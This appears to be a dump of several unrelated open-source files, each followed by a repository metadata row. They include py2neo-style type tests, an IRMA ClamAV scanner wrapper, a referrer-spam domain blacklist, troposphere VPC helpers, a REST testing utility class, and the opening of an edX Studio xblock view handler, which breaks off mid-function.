o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_date_time(graph):
skip_if_no_temporal_support(graph)
i = DateTime(2014, 8, 6, 12, 34, 56.789)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_duration(graph):
skip_if_no_temporal_support(graph)
i = Duration(months=1, days=2, seconds=3)
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_cartesian_point(graph):
skip_if_no_temporal_support(graph)
i = CartesianPoint((12.34, 56.78))
o = graph.evaluate("RETURN $x", x=i)
assert o == i
def test_wgs84_point(graph):
skip_if_no_temporal_support(graph)
i = WGS84Point((12.34, 56.78))
o = graph.evaluate("RETURN $x", x=i)
assert o == i
| apache-2.0 | 5,860,425,260,002,688,000 | 25.36129 | 103 | 0.631424 | false |
hirokihamasaki/irma | probe/modules/antivirus/clamav/clam.py | 1 | 3588 | #
# Copyright (c) 2013-2016 Quarkslab.
# This file is part of IRMA project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the top-level directory
# of this distribution and at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# No part of the project, including this file, may be copied,
# modified, propagated, or distributed except according to the
# terms contained in the LICENSE file.
import logging
import re
from ..base import Antivirus
log = logging.getLogger(__name__)
class Clam(Antivirus):
_name = "Clam AntiVirus Scanner (Linux)"
# ==================================
# Constructor and destructor stuff
# ==================================
def __init__(self, *args, **kwargs):
# class super class constructor
super(Clam, self).__init__(*args, **kwargs)
# scan tool variables
self._scan_args = (
"--infected " # only print infected files
"--fdpass " # avoid file access problem as clamdameon
# is runned by clamav user
"--no-summary " # disable summary at the end of scanning
"--stdout " # do not write to stderr
)
self._scan_patterns = [
re.compile(r'(?P<file>.*): (?P<name>[^\s]+) FOUND', re.IGNORECASE)
]
# ==========================================
# Antivirus methods (need to be overriden)
# ==========================================
def get_version(self):
"""return the version of the antivirus"""
result = None
if self.scan_path:
cmd = self.build_cmd(self.scan_path, '--version')
retcode, stdout, stderr = self.run_cmd(cmd)
if not retcode:
matches = re.search(r'(?P<version>\d+(\.\d+)+)',
stdout,
re.IGNORECASE)
if matches:
result = matches.group('version').strip()
return result
def get_database(self):
"""return list of files in the database"""
# NOTE: we can use clamconf to get database location, but it is not
# always installed by default. Instead, hardcode some common paths and
# locate files using predefined patterns
search_paths = [
'/var/lib/clamav', # default location in debian
]
database_patterns = [
'main.cvd',
'daily.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'bytecode.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'safebrowsing.c[lv]d', # *.cld on debian and on
# *.cvd on clamav website
'*.hdb', # clamav hash database
'*.mdb', # clamav MD5, PE-section based
'*.ndb', # clamav extended signature format
'*.ldb', # clamav logical signatures
]
results = []
for pattern in database_patterns:
result = self.locate(pattern, search_paths, syspath=False)
results.extend(result)
return results if results else None
def get_scan_path(self):
"""return the full path of the scan tool"""
paths = self.locate("clamdscan")
return paths[0] if paths else None
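# Quick illustration (not part of the module): what the scan pattern above
# extracts from a typical clamdscan report line. The sample line is made up.
if __name__ == "__main__":
    sample = "/tmp/eicar.com.txt: Eicar-Test-Signature FOUND"
    pattern = re.compile(r'(?P<file>.*): (?P<name>[^\s]+) FOUND', re.IGNORECASE)
    found = pattern.match(sample)
    print("file={0} signature={1}".format(found.group('file'), found.group('name')))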
| apache-2.0 | 4,104,439,727,466,220,000 | 37.170213 | 78 | 0.516165 | false |
archshift/analytics-report | ReferrerBlacklist.py | 1 | 4361 | # From https://github.com/piwik/referrer-spam-blacklist/blob/master/spammers.txt - update regularly
referrer_blacklist = """0n-line.tv
100dollars-seo.com
12masterov.com
1pamm.ru
4webmasters.org
5forex.ru
7makemoneyonline.com
acads.net
adcash.com
adspart.com
adventureparkcostarica.com
adviceforum.info
affordablewebsitesandmobileapps.com
afora.ru
akuhni.by
allknow.info
allnews.md
allwomen.info
alpharma.net
altermix.ua
amt-k.ru
anal-acrobats.hol.es
anapa-inns.ru
android-style.com
anticrawler.org
arendakvartir.kz
arkkivoltti.net
artparquet.ru
aruplighting.com
autovideobroadcast.com
aviva-limoux.com
azartclub.org
baixar-musicas-gratis.com
baladur.ru
balitouroffice.com
bard-real.com.ua
bestmobilityscooterstoday.com
best-seo-offer.com
best-seo-solution.com
bestwebsitesawards.com
bif-ru.info
biglistofwebsites.com
billiard-classic.com.ua
bizru.info
blackhatworth.com
bluerobot.info
blue-square.biz
bmw.afora.ru
brakehawk.com
break-the-chains.com
brk-rti.ru
brothers-smaller.ru
budmavtomatika.com.ua
buttons-for-website.com
buttons-for-your-website.com
buy-cheap-online.info
buy-forum.ru
cardiosport.com.ua
cartechnic.ru
cenokos.ru
cenoval.ru
cezartabac.ro
cityadspix.com
ci.ua
civilwartheater.com
coderstate.com
codysbbq.com
conciergegroup.org
connectikastudio.com
cubook.supernew.org
customsua.com.ua
dailyrank.net
darodar.com
delfin-aqua.com.ua
demenageur.com
descargar-musica-gratis.net
detskie-konstruktory.ru
dipstar.org
djekxa.ru
dojki-hd.com
domination.ml
doska-vsem.ru
dostavka-v-krym.com
drupa.com
dvr.biz.ua
e-buyeasy.com
ecomp3.ru
econom.co
edakgfvwql.ru
egovaleo.it
ekto.ee
e-kwiaciarz.pl
elmifarhangi.com
erot.co
escort-russian.com
este-line.com.ua
euromasterclass.ru
europages.com.ru
eurosamodelki.ru
event-tracking.com
fbdownloader.com
fiverr.com
floating-share-buttons.com
forex-procto.ru
forsex.info
forum20.smailik.org
forum69.info
free-share-buttons.com
free-social-buttons.com
freewhatsappload.com
fsalas.com
generalporn.org
germes-trans.com
get-free-traffic-now.com
ghazel.ru
girlporn.ru
gkvector.ru
glavprofit.ru
gobongo.info
goodprotein.ru
googlsucks.com
guardlink.org
handicapvantoday.com
howopen.ru
howtostopreferralspam.eu
hulfingtonpost.com
humanorightswatch.org
hundejo.com
hvd-store.com
ico.re
igru-xbox.net
iloveitaly.ro
iloveitaly.ru
ilovevitaly.co
ilovevitaly.com
ilovevitaly.info
ilovevitaly.org
ilovevitaly.ru
iminent.com
imperiafilm.ru
investpamm.ru
iskalko.ru
ispaniya-costa-blanca.ru
it-max.com.ua
jjbabskoe.ru
kabbalah-red-bracelets.com
kambasoft.com
kazrent.com
kino-fun.ru
kino-key.info
kinopolet.net
knigonosha.net
konkursov.net
laxdrills.com
littleberry.ru
livefixer.com
luxup.ru
makemoneyonline.com
manualterap.roleforum.ru
maridan.com.ua
masterseek.com
mebelcomplekt.ru
mebeldekor.com.ua
med-zdorovie.com.ua
minegam.com
mini.7zap.com
mirobuvi.com.ua
mirtorrent.net
mobilemedia.md
moyakuhnia.ru
msk.afora.ru
muscle-factory.com.ua
myftpupload.com
niki-mlt.ru
novosti-hi-tech.ru
online-hit.info
onlywoman.org
o-o-6-o-o.com
o-o-6-o-o.ru
o-o-8-o-o.ru
ooo-olni.ru
ozas.net
palvira.com.ua
petrovka-online.com
photokitchendesign.com
pornhub-forum.ga
pornhub-forum.uni.me
pornhub-ru.com
pornoforadult.com
portnoff.od.ua
pozdravleniya-c.ru
priceg.com
pricheski-video.com
producm.ru
prodvigator.ua
prointer.net.ua
promoforum.ru
psa48.ru
qwesa.ru
ranksonic.info
ranksonic.org
rapidgator-porn.ga
rcb101.ru
research.ifmo.ru
resellerclub.com
reversing.cc
rightenergysolutions.com.au
rospromtest.ru
sady-urala.ru
sanjosestartups.com
savetubevideo.com
screentoolkit.com
search-error.com
semalt.com
semaltmedia.com
seoexperimenty.ru
seopub.net
seo-smm.kz
sexyteens.hol.es
sharebutton.net
sharebutton.to
shop.xz618.com
sibecoprom.ru
simple-share-buttons.com
siteripz.net
sitevaluation.org
sledstvie-veli.net
slftsdybbg.ru
slkrm.ru
soaksoak.ru
social-buttons.com
socialseet.ru
sohoindia.net
solnplast.ru
sosdepotdebilan.com
spb.afora.ru
spravka130.ru
steame.ru
success-seo.com
superiends.org
taihouse.ru
tattooha.com
tedxrj.com
theguardlan.com
tomck.com
toyota.7zap.com
traffic2money.com
trafficmonetize.org
trafficmonetizer.org
trion.od.ua
uasb.ru
uzungil.com
videos-for-your-business.com
video-woman.com
viel.su
viktoria-center.ru
vodaodessa.com
vodkoved.ru
webmaster-traffic.com
webmonetizer.net
websites-reviews.com
websocial.me
wmasterlead.com
ykecwqlixx.ru
youporn-forum.ga
youporn-forum.uni.me
youporn-ru.com
zastroyka.org
""" | mit | 5,168,972,530,511,333,000 | 15.095941 | 99 | 0.837881 | false |
mccormickmichael/laurel | scaffold/cf/net.py | 1 | 1726 | #!/usr/bin/python
# Common functions and builders for VPC Templates
import troposphere as tp
import troposphere.ec2 as ec2
CIDR_ANY = '0.0.0.0/0'
CIDR_NONE = '0.0.0.0/32'
HTTP = 80
HTTPS = 443
SSH = 22
EPHEMERAL = (32767, 65536)
NAT = (1024, 65535)
ANY_PORT = (0, 65535)
TCP = '6'
UDP = '17'
ICMP = '1'
ANY_PROTOCOL = '-1'
def sg_rule(cidr, ports, protocol):
from_port, to_port = _asduo(ports)
return ec2.SecurityGroupRule(CidrIp=cidr,
FromPort=from_port,
ToPort=to_port,
IpProtocol=protocol)
def nacl_ingress(name, nacl, number, ports, protocol, cidr=CIDR_ANY, action='allow'):
return _nacl_rule(name, nacl, number, ports, protocol, False, cidr, action)
def nacl_egress(name, nacl, number, ports, protocol, cidr=CIDR_ANY, action='allow'):
return _nacl_rule(name, nacl, number, ports, protocol, True, cidr, action)
def _nacl_rule(name, nacl, number, ports, protocol, egress, cidr, action):
from_port, to_port = _asduo(ports)
return ec2.NetworkAclEntry(name,
NetworkAclId=_asref(nacl),
RuleNumber=number,
Protocol=protocol,
PortRange=ec2.PortRange(From=from_port, To=to_port),
Egress=egress,
RuleAction=action,
CidrBlock=cidr)
def _asduo(d):
return d if type(d) in [list, tuple] else (d, d)
def _asref(o):
return o if isinstance(o, tp.Ref) else tp.Ref(o)
def az_name(region, az):
if az.startswith(region):
return az
return region + az.lower()
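# Example usage (illustrative): an SSH ingress rule for a security group and an
# HTTP allow entry for a network ACL. "PublicNacl" is a made-up resource name
# standing in for a real troposphere NetworkAcl in a template.
if __name__ == "__main__":
    ssh_rule = sg_rule(CIDR_ANY, SSH, TCP)
    http_entry = nacl_ingress("AllowHttpIn", "PublicNacl", 100, HTTP, TCP)
    print("%s ingress on ports %s-%s" % (ssh_rule.IpProtocol, ssh_rule.FromPort, ssh_rule.ToPort))
    print("NACL entry resource: %s" % http_entry.title)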
| unlicense | -5,010,251,801,299,284,000 | 25.96875 | 85 | 0.562572 | false |
warriorframework/warriorframework | warrior/Framework/ClassUtils/rest_utils_class.py | 1 | 26837 | '''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""API for operations related to REST Interfaces
Packages used = Requests (documentation available at http://docs.python-requests.org/) """
import re
import time
import os
import os.path
import json as JSON
from xml.dom.minidom import parseString
from Framework.Utils.testcase_Utils import pNote
import Framework.Utils as Utils
from Framework.ClassUtils.json_utils_class import JsonUtils
from Framework.Utils.print_Utils import print_error
from Framework.Utils import string_Utils
from Framework.Utils import data_Utils
class WRest(object):
"""WRest class has methods required to interact
with REST interfaces"""
def __init__(self):
"""constructor for WRest """
self.req = None
self.import_requests()
self.json_utils = JsonUtils()
def import_requests(self):
"""Import the requests module """
try:
import requests
except ImportError:
pNote("Requests module is not installed"\
"Please install requests module to"\
"perform any activities related to REST interfaces", "error")
else:
self.req = requests
def post(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http post method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http post", "info")
try:
response = self.req.post(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'post')
return status, response
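    # Typical call pattern (illustrative values only): any 2xx status passes
    # when expected_response is omitted, or pass a specific code / list of codes.
    #   rest = WRest()
    #   status, response = rest.post("http://host/api/items",
    #                                expected_response=["201", "202"],
    #                                data='{"name": "demo"}',
    #                                headers={"Content-Type": "application/json"})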
def get(self, url, expected_response=None, params=None, auth=None, **kwargs):
"""performs a http get method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http get", "info")
try:
response = self.req.get(url, params=params, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'get')
return status, response
def put(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http put method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http put", "info")
try:
response = self.req.put(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'put')
return status, response
def patch(self, url, expected_response=None, data=None, auth=None, **kwargs):
""" performs a http patch method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http patch", "info")
try:
response = self.req.patch(url, data=data, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'patch')
return status, response
def delete(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http delete method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http delete", "info")
try:
response = self.req.delete(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'delete')
return status, response
def options(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http options method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http options", "info")
try:
response = self.req.options(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'options')
return status, response
def head(self, url, expected_response=None, auth=None, **kwargs):
""" performs a http head method
Please refer to the python-requests docs for parameter type support.
api reference: https://github.com/kennethreitz/requests/blob/master/requests/api.py
expected_response is an additional parameter that accepts a string as an input
and also a list of strings
Eg: "204"
["201", "202", "404", "302"]
"""
pNote("Perform a http head", "info")
try:
response = self.req.head(url, auth=auth, **kwargs)
except Exception as e:
status, response = self.catch_expection_return_error(e, url)
else:
status = self.report_response_status(response.status_code, expected_response, 'head')
return status, response
def cmp_response(self, response, expected_api_response,
expected_response_type, output_file,
generate_output_diff_file=True):
"""
Performs the comparison between api response
and expected_api_response
arguments:
            1.response: API response fetched from the data repository
            2.expected_api_response: the expected response, provided by the
              user, against which the actual response is compared.
            3.expected_response_type: The type of the expected response.
              It can be xml or json or text.
            4.output_file: The file in which the difference will be written
              if the responses are not equal.
            5.generate_output_diff_file: If the responses do not match, an
              output file containing the difference is generated by default;
              if this is set to False, no file is generated.
returns:
Returns True if the response matches with
the expected response else False.
"""
if response is not None and expected_api_response is not None:
if expected_response_type in response.headers['Content-Type']:
extracted_response = response.content
extension = Utils.rest_Utils.get_extension_from_path(expected_api_response)
if 'xml' in response.headers['Content-Type']:
try:
f = open(expected_api_response, 'r')
except IOError as exception:
if ".xml" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
status, sorted_file1, sorted_file2, output_file = \
Utils.xml_Utils.compare_xml(extracted_response, expected_api_response,
output_file, sorted_json=False)
elif 'json' in response.headers['Content-Type']:
try:
expected_api_response = JSON.load(open(expected_api_response, 'r'))
for key, value in expected_api_response.items():
# replacing the environment/repo variable with value in the verify json
dict_key_value = {key: value}
env_out = data_Utils.sub_from_env_var(dict_key_value)
details_dict = data_Utils.sub_from_data_repo(dict_key_value)
expected_api_response[key] = env_out[key]
expected_api_response[key] = details_dict[key]
except IOError as exception:
if ".json" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
expected_api_response = JSON.loads(expected_api_response)
extracted_response = JSON.loads(extracted_response)
status = self.json_utils.write_json_diff_to_file(
extracted_response, expected_api_response, output_file)
elif 'text' in response.headers['Content-Type']:
try:
f = open(expected_api_response, 'r')
expected_api_response = f.read()
f.close()
except IOError as exception:
if ".txt" == extension:
pNote("File does not exist in the"
" provided file path", "error")
return False
status = Utils.string_Utils.text_compare(
extracted_response, expected_api_response, output_file)
if not status:
if not generate_output_diff_file:
os.remove(output_file)
else:
pNote("api_response and expected_api_response do not match", "error")
pNote("The difference between the responses is saved here:{0}".format(output_file), "info")
return status
else:
type_of_response = Utils.rest_Utils.\
get_type_of_api_response(response)
pNote("Expected response type is {0}".
format(expected_response_type), "info")
pNote("API response type is {0}".
format(type_of_response), "info")
pNote("api_response and expected_api_response"
" types do not match", "error")
return False
else:
return False
def cmp_content_response(self, datafile, system_name, response,
expected_api_response, expected_response_type,
comparison_mode):
"""
Performs the comparison between api response
and expected_api_response
arguments:
1. datafile: Datafile of the test case
2. system_name: Name of the system from the datafile
Pattern: String Pattern
Multiple Values: No
Max Numbers of Values Accepted: 1
Characters Accepted: All Characters
Other Restrictions: Should be valid system name
from the datafile
eg: http_system_1
3. response: API response getting from the data repository
4. expected_api_response : expected response which needs
to be compared given by the user.
5. expected_response_type: The type of the expected response.
It can be xml or json or text.
6. comparison_mode:
               This is the mode in which you wish to compare.
               The supported comparison modes are
               file, string, regex=expression, jsonpath=path, xpath=path
               If comparison_mode is given as file or string, the whole
               response is compared.
               To check only the content of the expected response: if there is
               only one value_check, pass it in either the data file or the
               test case file.
               If there is more than one value_check, pass them in the data
               file under the system, in the comparison_mode and
               expected_api_response tags.
               For an xml response you need to give xpath=path.
               For a string response you can pass regex=expressions
               and leave expected_api_response empty.
Ex for passing values in data file if it is json response
<comparison_mode>
<response_path>jsonpath=1.2.3</response_path>
<response_path>jsonpath=1.2</response_path>
</comparison_mode>
<expected_api_response>
<response_value>4</response_value>
<response_value>5</response_value>
</expected_api_response>
returns:
Returns True if the response matches with
the expected response else False.
"""
if expected_response_type in response.headers['Content-Type']:
extracted_response = response.content
if comparison_mode:
path_list = [comparison_mode]
responses_list = [expected_api_response]
else:
path_list, responses_list = Utils.xml_Utils.\
list_path_responses_datafile(datafile, system_name)
if path_list:
if "xml" in response.headers['Content-Type']:
status = Utils.xml_Utils.compare_xml_using_xpath(extracted_response,
path_list, responses_list)
elif "json" in response.headers['Content-Type']:
status = self.json_utils.compare_json_using_jsonpath(extracted_response,
path_list, responses_list)
else:
status = Utils.string_Utils.compare_string_using_regex(extracted_response,
path_list)
else:
print_error("Please provide the values for comparison_mode and "
"expected_api_response")
status = False
else:
type_of_response = Utils.rest_Utils.\
get_type_of_api_response(response)
pNote("Expected response type is {0}".
format(expected_response_type), "info")
pNote("API response type is {0}".
format(type_of_response), "info")
pNote("api_response and expected_api_response"
" types do not match", "error")
status = False
return status
@classmethod
def report_response_status(cls, status, expected_response, action):
"""Reports the response status of http
actions with a print message to the user"""
result = False
if expected_response is None or expected_response is False or \
expected_response == [] or expected_response == "":
pattern = re.compile('^2[0-9][0-9]$')
if pattern.match(str(status)) is not None:
pNote("http {0} successful".format(action), "info")
result = True
elif isinstance(expected_response, list):
for i in range(0, len(expected_response)):
if str(status) == expected_response[i]:
pNote("http {0} successful".format(action), "info")
result = True
elif str(status) == expected_response:
pNote("http {0} successful".format(action), "info")
result = True
if not result:
pNote("http {0} failed".format(action), "error")
return result
def catch_expection_return_error(self, exception_name, url):
""" Function for catching expections thrown by REST operations
"""
if exception_name.__class__.__name__ == self.req.exceptions.ConnectionError.__name__:
pNote("Max retries exceeded with URL {0}. Failed to establish a new connection.".
format(url), "error")
status = False
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.InvalidURL.__name__:
pNote("Could not process the request. {0} is somehow invalid.".format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.URLRequired.__name__:
pNote("Could not process the request. A valid URL is required to make a request.".
format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.MissingSchema.__name__:
pNote("Could not process the request. The URL schema (e.g. http or https) is missing.".
format(url), "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == ValueError.__name__:
pNote("Could not process the request. May be the value provided for timeout is "
"invalid or the schema is invalid.", "error")
status = "ERROR"
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.ConnectTimeout.__name__:
pNote("The request timed out while trying to connect to the remote server.", "error")
status = False
response = None
elif exception_name.__class__.__name__ == self.req.exceptions.ReadTimeout.__name__:
pNote("The server did not send any data in the allotted amount of time.", "error")
status = False
response = None
else:
pNote("An Error Occurred: {0}".format(exception_name), "error")
status = False
response = None
return status, response
def check_connection(self, url, auth=None, **kwargs):
"""Internally uses the http options to check connection status.
i.e.
- If connection is successfull return a true
- if any ConnectionError is detected returns a False."""
try:
status = False
api_response = self.req.options(url, auth=auth, **kwargs)
            if not (str(api_response.status_code).startswith('2') or
                    str(api_response.status_code).startswith('1')):
                pNote("Connection was successful, but there was a "
                      "problem accessing the resource: {0}".format(url), "info")
status = False
except self.req.ConnectionError:
pNote("Connection to url is down: {0}".format(url), "debug")
except self.req.HTTPError:
pNote("Problem accessing resource: {0}".format(url), "debug")
else:
pNote("Connection to resource successfull: {0}".format(url), "debug")
status = True
return status
def update_output_dict(self, system_name, api_response, request_id, status, i):
"""
        Updates the output dictionary with the status code, the response object
        and the text response, and also stores per-request entries (response
        object, text, status code, headers and extracted content) keyed by the
        request id and/or the request number.
"""
output_dict = {}
pNote("Total number of requests in this step: {0}".format(i))
pNote("This is request number: {0}".format(i))
pNote("status: {0}".format(status), "debug")
pNote("api_response: {0}".format(api_response), "debug")
output_dict["{0}_api_response".format(system_name)] = api_response
output_dict["{0}_api_response_object".format(system_name)] = api_response
if api_response is not None:
text = api_response.text
status_code = api_response.status_code
headers = api_response.headers
output_response = self.get_output_response(api_response)
history = api_response.history
else:
text = None
status_code = None
headers = None
output_response = None
history = None
output_dict["{0}_status".format(system_name)] = status_code
pNote("api_response_history: {0}".format(history), "debug")
if request_id is not None:
output_dict["{0}_{1}_api_response_object_{2}".format(system_name, request_id, i)] = api_response
output_dict["{0}_{1}_api_response_text_{2}".format(system_name, request_id, i)] = text
output_dict["{0}_{1}_api_response_status_{2}".format(system_name, request_id, i)] = status_code
output_dict["{0}_{1}_api_response_headers_{2}".format(system_name, request_id, i)] = headers
output_dict["{0}_{1}_api_response_content_{2}".format(system_name, request_id, i)] = output_response
output_dict["{0}_{1}_api_response_object".format(system_name, request_id)] = api_response
output_dict["{0}_{1}_api_response_text".format(system_name, request_id)] = text
output_dict["{0}_{1}_api_response_status".format(system_name, request_id)] = status_code
output_dict["{0}_{1}_api_response_headers".format(system_name, request_id)] = headers
output_dict["{0}_{1}_api_response_content".format(system_name, request_id)] = output_response
else:
output_dict["{0}_api_response_object_{1}".format(system_name, i)] = api_response
output_dict["{0}_api_response_text_{1}".format(system_name, i)] = text
output_dict["{0}_api_response_status_{1}".format(system_name, i)] = status_code
output_dict["{0}_api_response_headers_{1}".format(system_name, i)] = headers
output_dict["{0}_api_response_content_{1}".format(system_name, i)] = output_response
output_dict["{0}_api_response_object".format(system_name)] = api_response
output_dict["{0}_api_response_text".format(system_name)] = text
output_dict["{0}_api_response_status".format(system_name)] = status_code
output_dict["{0}_api_response_headers".format(system_name)] = headers
output_dict["{0}_api_response_content".format(system_name)] = output_response
return output_dict
@staticmethod
def get_output_response(api_response):
"""
This method is used to convert the given api_response in the form of text / xml / json
Params:
api_response : api_response
Returns:
            output_response in the form of text/xml/json
"""
if api_response is not None:
try:
output_response = parseString("".join(api_response.text))
except:
try:
JSON.loads(api_response.text)
except:
output_response = api_response.text.encode('ascii', 'ignore')
pNote("api_response Text: \n {0}".format(output_response))
else:
output_response = api_response.json()
pNote("api_response (JSON format): \n {0}".
format(JSON.dumps(output_response, indent=4)))
else:
pNote("api_response (XML format): \n {0}".
format(output_response.toprettyxml(newl='\n')))
else:
output_response = None
return output_response
def try_until_resource_status(self, url, auth=None, status="up", trials=5, **kwargs):
""" Tries to connect to the resource until resource
reaches the specified status. Tries for the number mentioned in the
trials parameter (default=5)
waits for a time of 30 seconds between trials
"""
final_status = False
if status.upper() == "UP":
expected_result = True
elif status.upper() == "DOWN":
expected_result = False
i = 1
while i <= trials:
pNote("Trial: {0}".format(i), "info")
result = self.check_connection(url, auth, **kwargs)
if result == expected_result:
final_status = True
break
i += 1
time.sleep(10)
return final_status | apache-2.0 | 2,335,298,934,855,537,700 | 47.096774 | 115 | 0.571077 | false |
pelikanchik/edx-platform | cms/djangoapps/contentstore/views/item.py | 1 | 18095 | # -*- coding: utf-8 -*-
"""Views for items (modules)."""
import json
import logging
from uuid import uuid4
from functools import partial
from static_replace import replace_static_urls
from xmodule_modifiers import wrap_xblock
from django.core.exceptions import PermissionDenied
from django.contrib.auth.decorators import login_required
from xmodule.modulestore.django import modulestore, loc_mapper
from xmodule.modulestore.inheritance import own_metadata
from xmodule.modulestore.exceptions import ItemNotFoundError, InvalidLocationError
from util.json_request import expect_json, JsonResponse
from util.string_utils import str_to_bool
from ..transcripts_utils import manage_video_subtitles_save
from ..utils import get_modulestore
from .access import has_access
from .helpers import _xmodule_recurse
from xmodule.x_module import XModuleDescriptor
from django.views.decorators.http import require_http_methods
from xmodule.modulestore.locator import BlockUsageLocator
from student.models import CourseEnrollment
from django.http import HttpResponseBadRequest
from xblock.fields import Scope
from preview import handler_prefix, get_preview_html
from edxmako.shortcuts import render_to_response, render_to_string
from models.settings.course_grading import CourseGradingModel
__all__ = ['orphan_handler', 'xblock_handler']
log = logging.getLogger(__name__)
# cdodge: these are categories which should not be parented, they are detached from the hierarchy
DETACHED_CATEGORIES = ['about', 'static_tab', 'course_info']
CREATE_IF_NOT_FOUND = ['course_info']
# pylint: disable=unused-argument
@require_http_methods(("DELETE", "GET", "PUT", "POST"))
@login_required
@expect_json
def xblock_handler(request, tag=None, package_id=None, branch=None, version_guid=None, block=None):
"""
The restful handler for xblock requests.
DELETE
json: delete this xblock instance from the course. Supports query parameters "recurse" to delete
all children and "all_versions" to delete from all (mongo) versions.
GET
json: returns representation of the xblock (locator id, data, and metadata).
if ?fields=graderType, it returns the graderType for the unit instead of the above.
html: returns HTML for rendering the xblock (which includes both the "preview" view and the "editor" view)
PUT or POST
json: if xblock locator is specified, update the xblock instance. The json payload can contain
these fields, all optional:
:data: the new value for the data.
:children: the locator ids of children for this xblock.
:metadata: new values for the metadata fields. Any whose values are None will be deleted not set
to None! Absent ones will be left alone.
:nullout: which metadata fields to set to None
:graderType: change how this unit is graded
                :publish: can be one of three values, 'make_public', 'make_private', or 'create_draft'
            The JSON representation of the updated xblock (minus children) is returned.
        if xblock locator is not specified, create a new xblock instance. The json payload can contain
these fields:
:parent_locator: parent for new xblock, required
:category: type of xblock, required
:display_name: name for new xblock, optional
:boilerplate: template name for populating fields, optional
The locator (and old-style id) for the created xblock (minus children) is returned.
"""
if package_id is not None:
locator = BlockUsageLocator(package_id=package_id, branch=branch, version_guid=version_guid, block_id=block)
if not has_access(request.user, locator):
raise PermissionDenied()
old_location = loc_mapper().translate_locator_to_location(locator)
if request.method == 'GET':
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
fields = request.REQUEST.get('fields', '').split(',')
if 'graderType' in fields:
# right now can't combine output of this w/ output of _get_module_info, but worthy goal
return JsonResponse(CourseGradingModel.get_section_grader_type(locator))
# TODO: pass fields to _get_module_info and only return those
rsp = _get_module_info(locator)
return JsonResponse(rsp)
else:
component = modulestore().get_item(old_location)
# Wrap the generated fragment in the xmodule_editor div so that the javascript
# can bind to it correctly
component.runtime.wrappers.append(partial(wrap_xblock, handler_prefix))
try:
content = component.render('studio_view').content
# catch exceptions indiscriminately, since after this point they escape the
# dungeon and surface as uneditable, unsaveable, and undeletable
# component-goblins.
except Exception as exc: # pylint: disable=W0703
log.debug("Unable to render studio_view for %r", component, exc_info=True)
content = render_to_string('html_error.html', {'message': str(exc)})
mod_class = component.__class__.__name__
current_module_class = 'other'
if "CapaDescriptor" in mod_class:
current_module_class = 'problem'
if "VideoDescriptor" in mod_class:
current_module_class = 'video'
return render_to_response('component.html', {
'preview': get_preview_html(request, component),
'module_class': current_module_class,
'editor': content
})
elif request.method == 'DELETE':
delete_children = str_to_bool(request.REQUEST.get('recurse', 'False'))
delete_all_versions = str_to_bool(request.REQUEST.get('all_versions', 'False'))
return _delete_item_at_location(old_location, delete_children, delete_all_versions)
else: # Since we have a package_id, we are updating an existing xblock.
return _save_item(
request,
locator,
old_location,
data=request.json.get('data'),
children=request.json.get('children'),
metadata=request.json.get('metadata'),
